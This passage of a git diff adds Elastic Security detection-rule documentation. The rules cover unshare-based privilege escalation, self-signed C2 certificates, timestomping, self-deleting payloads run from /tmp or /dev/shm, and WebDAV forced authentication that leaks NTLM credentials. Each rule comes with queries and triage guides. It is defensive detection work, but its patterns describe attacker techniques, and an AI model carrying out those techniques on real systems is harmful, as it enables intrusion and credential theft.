unshare and UID Change* + + +The unshare utility can create new namespaces, including user namespaces. In some exploit chains, an attacker uses +unshare (often with user namespace flags) as a precursor step and then achieves a transition to root. This rule detects +a short sequence where a non-root user executes unshare with user-namespace related arguments and a subsequent uid_change +event indicates the user became root, which can represent a successful local privilege escalation attempt. + + +*Possible investigation steps* + + +- Review unshare arguments in the first event to confirm user namespace related flags were used (for example -U/--user or -r). +- Check the process tree and parent context (process.parent.entity_id) to understand what launched unshare and whether it originated from an interactive session or user-writable path. +- Confirm whether the uid_change corresponds to the same activity and identify the first root process spawned after the uid_change event. +- Review other host signals around the same time for exploit activity such as compilation in /tmp, suspicious downloads, or execution of unusual binaries. + + +*False positive analysis* + + +- Legitimate sandboxing or container tooling may use unshare and then legitimately trigger uid_change events; validate the parent process and user context. +- Security testing, exploit validation, or developer environments may intentionally exercise namespace-related behavior; tune by users, hosts, or maintenance windows. + + +*Response and remediation* + + +- Immediately isolate the affected host to prevent further privilege abuse or lateral movement. +- Terminate suspicious processes and collect forensic data (process tree, binaries, and relevant files in temp locations). +- Patch and harden the host; review policies that allow unprivileged user namespaces if not required in your environment. +- Escalate for incident response when root access is confirmed and scope for follow-on persistence. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.parent.entity_id, host.id with maxspan=60s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and + process.name == "unshare" and process.args : ("-r", "-rm", "-m", "-U", "--user") and user.id != "0"] + [process where host.os.type == "linux" and event.action == "uid_change" and event.type == "change" and + user.id == "0"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc new file mode 100644 index 0000000000..13e516d152 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc @@ -0,0 +1,247 @@ +[[prebuilt-rule-8-19-32-potential-self-signed-tls-certificate-recently-issued-on-external-connection]] +=== Potential Self-Signed TLS Certificate Recently Issued on External Connection + +Identifies completed outbound TLS connections to external destinations where the server presents a recently issued, likely self-signed certificate whose issuer and subject distinguished names are equal. C2 frameworks frequently use freshly generated self-signed certificates instead of publicly trusted CAs. This behavioral logic complements hash-based C2 certificate rules, such as default Cobalt Strike team-server certificates, by catching rotated or custom infrastructure that does not reuse default tooling certificates. Distinguished-name equality identifies self-issued certificates but does not cryptographically prove that the certificate signed itself. The rule does not cover private-CA signed certificates, where issuer and subject differ, or C2 that uses publicly trusted certificates such as Let's Encrypt. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/docs/reference/beats/packetbeat/configuration-tls +* https://www.elastic.co/docs/reference/ecs/ecs-x509 +* https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack + +*Tags*: + +* Domain: Network +* Use Case: Network Security Monitoring +* Use Case: Threat Detection +* Tactic: Command and Control +* Rule Type: ESQL +* Data Source: Network Packet Capture +* Data Source: Network Traffic +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Self-Signed TLS Certificate Recently Issued on External Connection* + + +Malware and post-exploitation C2 often ships with ephemeral, self-signed TLS certificates rather than CA-issued +credentials. This rule matches external, successfully established TLS sessions where the server certificate issuer +matches the subject (self-issued and commonly self-signed) and the `not_before` date falls between 30 days ago and the +current time. Matching sessions are aggregated by source IP, destination IP, subject DN, and certificate `not_before` +so repeated full handshakes in the same detection window collapse into one alert. Distinguished-name equality alone +does not cryptographically verify the certificate signature. + +This logic does not detect private-CA signed leaves (issuer DN differs from subject DN) or publicly trusted certificates. +Hash-based default-certificate rules remain complementary coverage for known tooling certs that are often years old. +Resumed TLS sessions typically omit `tls.server.x509.*` fields, so only full handshakes are eligible. + + +*Possible investigation steps* + + +- Review `source.ip`, `destination.ip`, `Esql.destination_port_values`, `tls.server.x509.subject.distinguished_name`, + `Esql.tls_server_x509_serial_number_values`, `tls.server.x509.not_before`, and `Esql.tls_client_server_name_values`. + Common names can be empty on self-signed certificates; prefer the distinguished name and serial. +- Compare SNI (`Esql.tls_client_server_name_values`) with the certificate subject. A mismatch is a useful pivot, not + proof of malice. +- Pivot on destination IP and certificate serial or available SHA-1/SHA-256 fingerprints across other internal sources: + ```esql + FROM logs-network_traffic.tls-* + | WHERE tls.established == true + AND tls.server.x509.issuer.distinguished_name == tls.server.x509.subject.distinguished_name + | STATS event_count = COUNT(*), hosts = MV_SLICE(VALUES(source.ip), 0, 99) + BY destination.ip, tls.server.x509.serial_number, tls.server.hash.sha1, tls.server.hash.sha256 + | SORT event_count DESC + ``` +- Correlate with endpoint alerts, DNS anomalies, or prior commodity C2 detections on the source host, including the + Default Cobalt Strike Team Server Certificate rule. +- Compare certificate age and validity window against expected vendor or ACME renewal patterns. ACME-issued public + certificates should not match this rule because they are not self-signed. + + +*False positive analysis* + + +- Internal developers testing against staging servers with self-signed certs may appear if traffic hairpins through + external IPs or if staging is hosted outside RFC1918 / ULA space. +- Newly published self-hosted services (Proxmox, NAS, cameras, small-business appliances) often generate a self-signed + certificate on first boot and will match for 30 days. Exclude by destination after validation. +- Some appliance vendors ship with short-lived factory self-signed certificates; exclude by destination after validation. +- Repeated alerts for the same source, destination, and certificate across intervals are expected while the certificate + remains inside the 30-day `not_before` window. Add a destination or serial exception after the first review if the + traffic is authorized. + + +*Response and remediation* + + +- Isolate the source host if the destination is unknown and no authorized workflow explains the session. +- Block the destination IP or domain at the perimeter pending investigation. +- Preserve the available certificate hashes, `Esql.tls_server_x509_serial_number_values`, and the subject DN for threat + intel sharing. Collect a PCAP or full TLS metadata sample when available. + + +==== Setup + + + +*Setup* + + +This rule requires TLS certificate metadata from the Elastic network_traffic integration +(`logs-network_traffic.tls-*`) with `send_certificates` enabled (the Packetbeat TLS default) so ECS fields under +`tls.server.x509.*` are populated, including `issuer.distinguished_name`, `subject.distinguished_name`, and +`not_before`. + +Packetbeat calculates SHA-1 certificate fingerprints by default. To populate `tls.server.hash.sha256`, add `sha256` to +the TLS protocol analyzer's `fingerprints` setting. + +Resumed TLS sessions typically do not include certificate fields and will not match. Legacy `packetbeat-*` indices are +intentionally not queried: this rule uses CIDR-based internal-to-external directionality that should be validated per +source mapping before claiming Packetbeat coverage. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-network_traffic.tls-* +| where + network.protocol == "tls" + and network.transport == "tcp" + and tls.established == true + and source.ip is not null + and destination.ip is not null + and tls.server.x509.not_before is not null + and tls.server.x509.issuer.distinguished_name is not null + and tls.server.x509.subject.distinguished_name is not null + and tls.server.x509.issuer.distinguished_name == tls.server.x509.subject.distinguished_name + and tls.server.x509.not_before >= now() - 30 days + and tls.server.x509.not_before <= now() + and CIDR_MATCH( + source.ip, + "10.0.0.0/8", + "100.64.0.0/10", + "172.16.0.0/12", + "192.168.0.0/16", + "fc00::/7" + ) + and not CIDR_MATCH( + destination.ip, + "0.0.0.0/8", + "10.0.0.0/8", + "100.64.0.0/10", + "127.0.0.0/8", + "169.254.0.0/16", + "172.16.0.0/12", + "192.0.0.0/24", + "192.0.2.0/24", + "192.168.0.0/16", + "192.175.48.0/24", + "192.31.196.0/24", + "192.52.193.0/24", + "192.88.99.0/24", + "198.18.0.0/15", + "198.51.100.0/24", + "203.0.113.0/24", + "224.0.0.0/4", + "240.0.0.0/4", + "::/128", + "::1/128", + "2001:db8::/32", + "fc00::/7", + "fe80::/10", + "ff00::/8" + ) +| stats + Esql.event_count = COUNT(*), + Esql.first_seen = MIN(@timestamp), + Esql.last_seen = MAX(@timestamp), + Esql.destination_port_values = MV_SLICE(VALUES(destination.port), 0, 9), + Esql.tls_client_server_name_values = MV_SLICE(VALUES(tls.client.server_name), 0, 9), + Esql.tls_server_x509_subject_common_name_values = MV_SLICE(VALUES(tls.server.x509.subject.common_name), 0, 9), + Esql.tls_server_x509_serial_number_values = MV_SLICE(VALUES(tls.server.x509.serial_number), 0, 4), + Esql.tls_server_hash_sha1_values = MV_SLICE(VALUES(tls.server.hash.sha1), 0, 4), + Esql.tls_server_hash_sha256_values = MV_SLICE(VALUES(tls.server.hash.sha256), 0, 4), + Esql.tls_server_x509_not_after_values = MV_SLICE(VALUES(tls.server.x509.not_after), 0, 4), + Esql.network_community_id_values = MV_SLICE(VALUES(network.community_id), 0, 9), + Esql.host_name_values = MV_SLICE(VALUES(host.name), 0, 9), + Esql.observer_name_values = MV_SLICE(VALUES(observer.name), 0, 19) + by + source.ip, + destination.ip, + tls.server.x509.subject.distinguished_name, + tls.server.x509.not_before +| keep + source.ip, + destination.ip, + tls.server.x509.subject.distinguished_name, + tls.server.x509.not_before, + Esql.event_count, + Esql.first_seen, + Esql.last_seen, + Esql.destination_port_values, + Esql.tls_client_server_name_values, + Esql.tls_server_x509_subject_common_name_values, + Esql.tls_server_x509_serial_number_values, + Esql.tls_server_hash_sha1_values, + Esql.tls_server_hash_sha256_values, + Esql.tls_server_x509_not_after_values, + Esql.network_community_id_values, + Esql.host_name_values, + Esql.observer_name_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Technique: +** Name: Encrypted Channel +** ID: T1573 +** Reference URL: https://attack.mitre.org/techniques/T1573/ +* Sub-technique: +** Name: Asymmetric Cryptography +** ID: T1573.002 +** Reference URL: https://attack.mitre.org/techniques/T1573/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-timestomp-in-executable-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-timestomp-in-executable-files.asciidoc new file mode 100644 index 0000000000..da7b1d3efc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-timestomp-in-executable-files.asciidoc @@ -0,0 +1,181 @@ +[[prebuilt-rule-8-19-32-potential-timestomp-in-executable-files]] +=== Potential Timestomp in Executable Files + +Identifies the modification of a file creation time for executable files in sensitive system directories. Adversaries may modify file time attributes to blend malicious executables with legitimate system files. Timestomping is a technique that modifies the timestamps of a file often to mimic files that are in trusted directories. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-windows.sysmon_operational-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Sysmon +* Resources: Investigation Guide + +*Version*: 112 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This guide was created by humans with the assistance of generative AI. While its contents have been manually curated to include the most valuable information, always validate assumptions and adjust procedures to match your internal runbooks and incident triage and response policies. + + +*Investigating Potential Timestomp in Executable Files* + + +This alert indicates that a process modified the creation timestamp of a file with an executable extension in a sensitive Windows directory or a common persistence location. Timestomping can be used to make recently created or modified files appear older and blend in with legitimate system content. + + +*Possible investigation steps* + +- Establish scope and validate context: + - Identify the affected endpoint using `host.name` and `host.id`, and determine whether similar alerts or related file-timestamp changes are occurring on the same host. + - Review `user.name`, `user.domain`, and `user.id` to understand whether the account typically performs administrative or software management activities on this endpoint. + - Use `@timestamp` to bound a focused time window for pivots (for example, shortly before and after the change). + +- Assess the timestamp change behavior: + - Compare `winlog.event_data.PreviousCreationUtcTime` to `winlog.event_data.CreationUtcTime` and note whether the timestamp was backdated, forward-dated, or aligned to an apparent baseline. + - Identify whether multiple files were modified in the same window by searching for additional events on the same `host.id` and `process.entity_id`. + +- Evaluate the target file: + - Review `file.path`, `file.directory`, `file.name`, and `file.extension` to determine whether the target is expected in that location and whether the name resembles a legitimate component for the directory. + - If the file is in a Startup location, treat it as a potential persistence artifact and prioritize determining whether it later executed on the host. + - If the file is in a system directory, assess whether the host role and recent maintenance activity could reasonably explain changes to that specific file. + +- Investigate the process responsible for the change: + - Review `process.executable` and `process.name` for signs of an unusual execution location, unexpected binary name, or a process that does not normally manage files in the target directory. + - Pivot using `process.entity_id` (or `process.pid` within a narrow time range) to reconstruct process ancestry and command context using your available process telemetry. + - Look for additional activity by the same process in the same time window, such as other file modifications involving the same `file.path` or other executable files in similar directories. + +- Check for follow-on execution and related activity: + - Search for subsequent activity on the same `host.id` where `process.executable` matches the alerted `file.path`, which can indicate the modified file was executed after timestomping. + - If the target is a shortcut (`file.extension` such as `lnk`), look for later execution on the host that aligns with user logon activity for `user.id` and the alert timeline. + - Identify whether the same `file.name` and `file.path` appear on other endpoints, which may indicate propagation, a shared deployment mechanism, or a broader intrusion set. + + +*False positive analysis* + +- Enterprise software deployment, patching, and self-update mechanisms can rewrite binaries and adjust file metadata as part of normal operations. +- Backup, restore, profile reset, and file synchronization workflows can preserve or reapply timestamps when placing executables into directories. +- Administrative troubleshooting or recovery activities (for example, repairing installations or restoring components) may result in unexpected timestamp changes for legitimate files. + + +*Response and remediation* + +- If the activity is unexpected or suspicious: + - Contain the host to limit further tampering and reduce the risk of execution or persistence. + - Preserve evidence for the alert by capturing the values of `file.path`, `process.executable`, `process.entity_id`, `user.id`, and the before/after timestamps, and collect related events on the same `host.id` in the surrounding window. + - Determine whether the affected file executed after the change by correlating activity on the same `host.id` and comparing `process.executable` to the alerted `file.path`. + - Acquire and analyze the target file and the modifying process binary using your standard tooling to assess reputation, integrity, and suspected origin. + - Remove or quarantine malicious files and remediate unauthorized persistence, especially for items placed in Startup locations. + - Scope across the environment for the same `file.path`, `file.name`, and `process.executable`, and apply containment actions to additional affected hosts as needed. + - If compromise is suspected, review access associated with `user.id` and follow incident response procedures for account containment and recovery. + +- If the activity is confirmed benign: + - Document the legitimate software or workflow responsible for the timestamp change, including the expected `process.executable` and target paths, to support consistent triage and future tuning. + + +==== Setup + + + +*Setup* + + +This rule requires Sysmon telemetry to be enabled and ingested. + +Setup instructions: https://ela.st/sysmon-event-2-setup + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and + event.provider == "Microsoft-Windows-Sysmon" and event.code == "2" and + file.extension : ( + "exe", "dll", "sys", "msi", "scr", "pif", "lnk" + ) and + file.path : ( + "?:\\Windows\\System32\\*", + "?:\\Windows\\SysWOW64\\*", + "?:\\ProgramData\\*", + "?:\\Users\\Public\\*", + "?:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", + "?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" + ) and + not process.executable : ( + "?:\\Program Files\\*", + "?:\\Program Files (x86)\\*", + "?:\\ProgramData\\Microsoft\\Windows Defender\\*", + "?:\\Windows\\system32\\cleanmgr.exe", + "?:\\Windows\\system32\\msiexec.exe", + "?:\\Windows\\syswow64\\msiexec.exe", + "?:\\Windows\\system32\\svchost.exe", + "?:\\Windows\\System32\\Robocopy.exe", + "?:\\Windows\\SysWOW64\\Robocopy.exe", + "?:\\Windows\\explorer.exe", + "?:\\Windows\\system32\\Dism.exe", + "?:\\Windows\\system32\\DFSRs.exe", + "?:\\Windows\\system32\\wbengine.exe", + "?:\\Windows\\system32\\CompatTelRunner.exe", + "?:\\Windows\\system32\\SearchIndexer.exe", + "?:\\Windows\\system32\\wuauclt.exe", + "?:\\Windows\\servicing\\TrustedInstaller.exe", + "?:\\Windows\\WinSxS\\*\\TiWorker.exe", + "?:\\Windows\\Microsoft.NET\\*", + "?:\\Windows\\SystemApps\\*", + "?:\\Windows\\uus\\*\\wuaucltcore.exe", + "?:\\$WINDOWS.~BT\\Sources\\mighost.exe" + ) and + not (process.executable : "?:\\Windows\\System32\\spoolsv.exe" and file.path : "?:\\Windows\\System32\\spool\\*") and + not user.name : ("SYSTEM", "Local Service", "Network Service") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Timestomp +** ID: T1070.006 +** Reference URL: https://attack.mitre.org/techniques/T1070/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-process-execution-followed-by-self-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-process-execution-followed-by-self-deletion.asciidoc new file mode 100644 index 0000000000..4ea6df32b0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-process-execution-followed-by-self-deletion.asciidoc @@ -0,0 +1,151 @@ +[[prebuilt-rule-8-19-32-process-execution-followed-by-self-deletion]] +=== Process Execution Followed by Self-Deletion + +Detects a process execution followed by immediate self-deletion, a common technique used by adversaries to remove traces of their activity on the system. This pattern is often observed in malware and APT campaigns. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-endpoint.events.file* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Process Execution Followed by Self-Deletion* + + +This rule detects a Linux process launched from a temporary, shared-memory, web, or file-descriptor path whose executable is deleted within 30 seconds, a pattern that can erase evidence and hinder analysis. An attacker may drop a payload in `/dev/shm`, execute it to establish access or run malicious commands, and immediately unlink the file while the process continues running. + + +*Possible investigation steps* + + +- Reconstruct the process tree and review the command line, user, working directory, execution context, and parent legitimacy to determine whether the activity was expected. +- If the process remains active, preserve volatile evidence such as its executable through `/proc//exe`, memory, open file descriptors, and cryptographic hashes before containment. +- Correlate nearby child processes, file modifications, persistence changes, DNS requests, and network connections to identify payload behavior and command-and-control activity. +- Trace how the executable reached the host using file-creation events, download records, shell activity, web-server logs, authentication events, and relevant audit telemetry. +- Search the environment for the same hash, command line, user, parent process, destination infrastructure, or deletion pattern, then isolate affected hosts and revoke exposed credentials when malicious activity is confirmed. + + +*False positive analysis* + + +- Legitimate installation, update, or maintenance scripts may execute a temporary helper from `/tmp`, `/var/tmp`, or `/run` and remove it after completion; verify the parent process, package or change records, signer or hash reputation, and timing against approved activity. +- Administrators or applications may intentionally run short-lived executables from shared memory, web directories, or file descriptors and unlink them immediately; confirm the initiating user, command line, expected application workflow, and absence of suspicious child processes or network activity. + + +*Response and remediation* + + +- Isolate affected Linux hosts from the network while preserving access for responders, and terminate malicious processes after capturing `/proc//exe`, memory, open file descriptors, hashes, and active connections. +- Remove related payloads and persistence from cron jobs, systemd units, shell profiles, SSH `authorized_keys`, startup scripts, web directories, temporary paths, and shared-memory locations. +- Revoke or rotate credentials, API keys, SSH keys, and session tokens used by the malicious process or exposed on the host, and block identified hashes, domains, IP addresses, and download sources. +- Reimage the host or restore it from a verified known-good backup when system integrity cannot be established, then validate packages, configurations, accounts, services, and security tooling before reconnecting it. +- Escalate to incident response immediately if the same payload or infrastructure appears on multiple hosts, privileged accounts were accessed, persistence is present, or command-and-control or data-exfiltration activity is identified. +- Prevent recurrence by restricting execution from `/tmp`, `/var/tmp`, `/dev/shm`, and web-writable directories where operationally feasible, correcting unsafe permissions, patching the initial access vector, and deploying detections for related hashes and behaviors. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id, host.id with maxspan=30s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and + process.executable like ( + "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/run/*", "/var/run/*", "/var/www/*", + "/proc/*/fd/*", "?memfd:*", "memfd:*" + )] by process.executable + [file where host.os.type == "linux" and event.action == "deletion"] by file.path + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: File Deletion +** ID: T1070.004 +** Reference URL: https://attack.mitre.org/techniques/T1070/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rare-connection-to-webdav-target.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rare-connection-to-webdav-target.asciidoc new file mode 100644 index 0000000000..8699983763 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rare-connection-to-webdav-target.asciidoc @@ -0,0 +1,157 @@ +[[prebuilt-rule-8-19-32-rare-connection-to-webdav-target]] +=== Rare Connection to WebDAV Target + +Identifies rare connection attempts to a Web Distributed Authoring and Versioning (WebDAV) resource. Attackers may inject WebDAV paths in files or features opened by a victim user to leak their NTLM credentials via forced authentication. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 1h + +*Searches indices from*: now-8h ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1187/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Data Source: Windows Security Event Logs +* Data Source: Microsoft Defender XDR +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 11 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Rare Connection to WebDAV Target* + + + +*Possible investigation steps* + + +- Examine the reputation of the destination domain or IP address. +- Verify if the target user opened any attachments or clicked links pointing to the same target within seconds from the alert timestamp. +- Correlate the findings with other security logs and alerts to identify any patterns or additional indicators of compromise related to the potential relay attack. + + +*False positive analysis* + + +- User accessing legit WebDAV resources. + + +*Response and remediation* + + +- Conduct a password reset for the target account that may have been compromised or are at risk, ensuring the use of strong, unique passwords. +- Verify whether other users were targeted but did not open the lure.. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the full scope of the breach. +- Conduct a post-incident review to identify any gaps in security controls and update policies or procedures to prevent recurrence, ensuring lessons learned are applied to improve overall security posture. + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +*Additional data sources* + + +This rule also supports the following third-party data sources. For setup instructions, refer to the links below: + +- https://ela.st/crowdstrike-integration[CrowdStrike] +- https://ela.st/m365-defender[Microsoft Defender XDR] +- https://ela.st/sysmon-event-1-setup[Sysmon Event ID 1 - Process Creation] +- https://ela.st/audit-process-creation[Windows Process Creation Logs] + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.process-*, logs-windows.sysmon_operational-*, logs-system.security-*, logs-windows.*, winlogbeat-*, logs-crowdstrike.fdr*, logs-m365_defender.event-* METADATA _id, _version, _index +| where + event.category == "process" and + event.type == "start" and + process.name == "rundll32.exe" and + process.command_line like "*DavSetCookie*" +| keep host.id, process.command_line, user.name, user.id +// extract the host from the WebDAV URL authority, excluding optional credentials and port +| grok process.command_line """(?i:https?)://(?:[^/@\s]+@)?(?[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*)""" +| eval Esql.server_webdav_server = TO_LOWER(Esql.server_webdav_server) +| where + Esql.server_webdav_server is not null and + not Esql.server_webdav_server in ("www.google.com", "www.elastic.co", "google.com", "github.com", "www.github.com", "sharepoint.com", "live.net") and + not Esql.server_webdav_server like ("*.live.net", "*.sharepoint.com") and + // excludes private IP ranges + not Esql.server_webdav_server rlike """(10\.(\d{1,3}\.){2}\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.(\d{1,3}\.)\d{1,3}|192\.168\.(\d{1,3}\.)\d{1,3})""" +| stats + Esql.event_count = count(*), + Esql.host_id_count_distinct = count_distinct(host.id), + Esql.host_id_values = values(host.id), + Esql.user_name_values = values(user.name) + by Esql.server_webdav_server +| where + Esql.host_id_count_distinct == 1 and Esql.event_count <= 3 +| eval host.id = MV_MIN(Esql.host_id_values), user.name = MV_MIN(Esql.user_name_values), destination.domain = MV_MIN(Esql.server_webdav_server) +| KEEP host.id, user.name, destination.domain, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Forced Authentication +** ID: T1187 +** Reference URL: https://attack.mitre.org/techniques/T1187/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* 